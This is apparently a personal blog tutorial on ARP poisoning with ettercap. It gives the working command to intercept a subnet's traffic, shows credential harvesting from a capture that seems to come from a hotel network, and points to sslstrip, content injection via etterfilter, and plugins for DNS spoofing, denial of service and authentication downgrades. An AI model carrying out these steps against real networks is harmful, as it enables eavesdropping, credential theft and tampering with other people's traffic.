Using ettercap for ARP poisoning

Ettercap is certainly nothing new, and there is plenty of documentation around to see how to use it, but I was sitting here goofing around and decided to record my results. I am not advocating this type of thing on a public network, and ARP poisoning or other attacks often fall afoul of terms of service for public and private networks, and may even be illegal in some jurisdictions.

 

First, I looked at my default route.

 

$ route -n

Kernel IP routing table

Destination     Gateway         Genmask         Flags Metric Ref    Use Iface

10.71.0.0       0.0.0.0         255.255.255.0   U     2      0        0 wlan0

0.0.0.0         10.71.0.1       0.0.0.0         UG    0      0        0 wlan0

 

To sniff the whole subnet, I’ll want to do some ARP poisoning to send all traffic to/from the default route through my system.

 

$ sudo ettercap -i wlan0 -T -M arp:remote /10.71.0.1/ //

 

You can also use “// //” to designate ARP poisoning no matter what source and destination ettercap sees. The “-T” tells ettercap to use the text interface, which is still interactive. There is also a curses-based interface, “-C”, and GTK with “-G” though it has always seemed less reliable to me than the others. The curses interface is actually pretty nice.

 

Once you run the command, ettercap should enumerate hosts and you will start seeing a bunch of traffic information scrolling through your console. How do we know if it’s actually working? If you see non-broadcast traffic destined for other hosts, it will be obvious and you will know you’re successfully sniffing all the traffic.

Another fun way is by opening etherape to see a realtime visualization of the traffic. If you are seeing typical non-broadcast traffic like HTTP, HTTPS, that’s an indicator that you’re successfully ARP poisoning. You can also get a quick idea if there are particular hosts getting a lot of traffic activity. I’ve seen the typical sites like Facebook, Amazon, Akamai, and LLNW, but also more interesting sites that are easily identifiable as VPN concentrators, banks, and more.

 

You can also of course use various tools including ettercap with the “-w” option to write traffic to a file and review at my leisure to look for interesting data. Ettercap also has an interesting utility to automatically grab usernames and passwords. From the man page:

 

-L, –log

Log  all  the packets to binary files. These files can be parsed

by etterlog(8) to extract human readable data. With this option,

all  packets  sniffed  by ettercap will be logged, together with

all the passive info (host info + user & pass) it  can  collect.

Given  a LOGFILE, ettercap will create LOGFILE.ecp (for packets)

and LOGFILE.eci (for the infos).

 

If you didn’t run this with ettercap originally, you can also run it on a saved packet capture.

 

$ ettercap -r hotel.raw -L hotel

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

 

Please select an User Interface

 

$ ls hotel*

 

hotel.eci  hotel.ecp  hotel.raw

$ etterlog -a hotel.eci

 

etterlog NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Log file version    : NG-0.7.3

Timestamp           : Wed Feb 16 14:20:57 2010

Type                : LOG_INFO

 

Number of hosts (total)       : 248

 

Number of local hosts         : 30

Number of non local hosts     : 0

Number of gateway             : 0

 

Number of discovered services : 240

Number of accounts captured   : 4

 

 

 

$ etterlog -p hotel.eci

74.125.93.191   TCP 80     USER: fakeuser      PASS: fakepasswd

 

I changed the data above and of course most sites these days are hopefully forcing encrypted logins.

 

These days, many sites can be hosted on one IP or virtual server. If you’re not catching the DNS or HTTP request specifically before the login that was captured, the easiest way to determine which site on a specific IP was being visited would be opening up the packet capture with a tool like Wireshark, using a filter for the IP, then looking at the actual web traffic for the site’s name. Looking in Wireshark, I can see the GET immediately after the TCP handshake.

 

GET /members/bbs/showthread.php HTTP/1.1

Host: www.fakedomain.com

 

This really just scratches the surface of what you can do with ettercap and other network tools. ARP poisoning still works, particularly on public networks, and many people log in to many services that can be easily compromised through sniffing (I write while sitting in an airport on public WiFi logged into my blogger account). A relatively recent high profile example was when the Metasploit site was briefly hijacked by successful ARP poisoning.

 

There are numerous other attacks besides sniffing that could succeed when ARP poisoning, many involving redirecting traffic or injecting malicious content. For instance, you can use something like sslstrip to redirect all HTTPS traffic to HTTP, grabbing credentials in the process. You could also inject content directly using etterfilter.

 

 DESCRIPTION

The etterfilter utility is used to compile  source  filter  files  into

binary  filter  files that can be interpreted by the JIT interpreter in

the ettercap(8) filter engine. You have to compile your filter  scripts

in  order  to  use  them  in  ettercap. All syntax/parse errors will be

checked at compile time, so you will  be  sure  to  produce  a  correct

binary filter for ettercap.

Using etterfilter you can inject new packets, replace data in packets, and more. If someone is visiting what they consider a known safe site, replacing data or injecting malicious packets can be quite successful. At a previous job, we had a non-production network for attack and defend fun, and with etterfilter I was able to replace all image requests by one of my colleagues’ browser and instead have it request the image to the left.

 

Although my example above is obviously on a wireless network as shown by using the wlan0 interface, you can easily perform ARP poisoning on a local wired segment. There are also a number of ways to help detect or prevent poisoning with your network appliances or software.

 

Finally, ettercap also has a number of interesting plugins available.

$ ettercap -P list

 

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

 

Available plugins :

 

arp_cop  1.1  Report suspicious ARP activity

autoadd  1.2  Automatically add new victims in the target range

chk_poison  1.1  Check if the poisoning had success

dns_spoof  1.1  Sends spoofed dns replies

dos_attack  1.0  Run a d.o.s. attack against an IP address

dummy  3.0  A plugin template (for developers)

find_conn  1.0  Search connections on a switched LAN

find_ettercap  2.0  Try to find ettercap activity

find_ip  1.0  Search an unused IP address in the subnet

finger  1.6  Fingerprint a remote host

finger_submit  1.0  Submit a fingerprint to ettercap’s website

gre_relay  1.0  Tunnel broker for redirected GRE tunnels

gw_discover  1.0  Try to find the LAN gateway

isolate  1.0  Isolate an host from the lan

link_type  1.0  Check the link type (hub/switch)

pptp_chapms1  1.0  PPTP: Forces chapms-v1 from chapms-v2

pptp_clear  1.0  PPTP: Tries to force cleartext tunnel

pptp_pap  1.0  PPTP: Forces PAP authentication

pptp_reneg  1.0  PPTP: Forces tunnel re-negotiation

rand_flood  1.0  Flood the LAN with random MAC addresses

remote_browser  1.2  Sends visited URLs to the browser

reply_arp  1.0  Simple arp responder

repoison_arp  1.0  Repoison after broadcast ARP

scan_poisoner  1.0  Actively search other poisoners

search_promisc  1.2  Search promisc NICs in the LAN

smb_clear  1.0  Tries to force SMB cleartext auth

smb_down  1.0  Tries to force SMB to not use NTLM2 key auth

stp_mangler  1.0  Become root of a switches spanning tree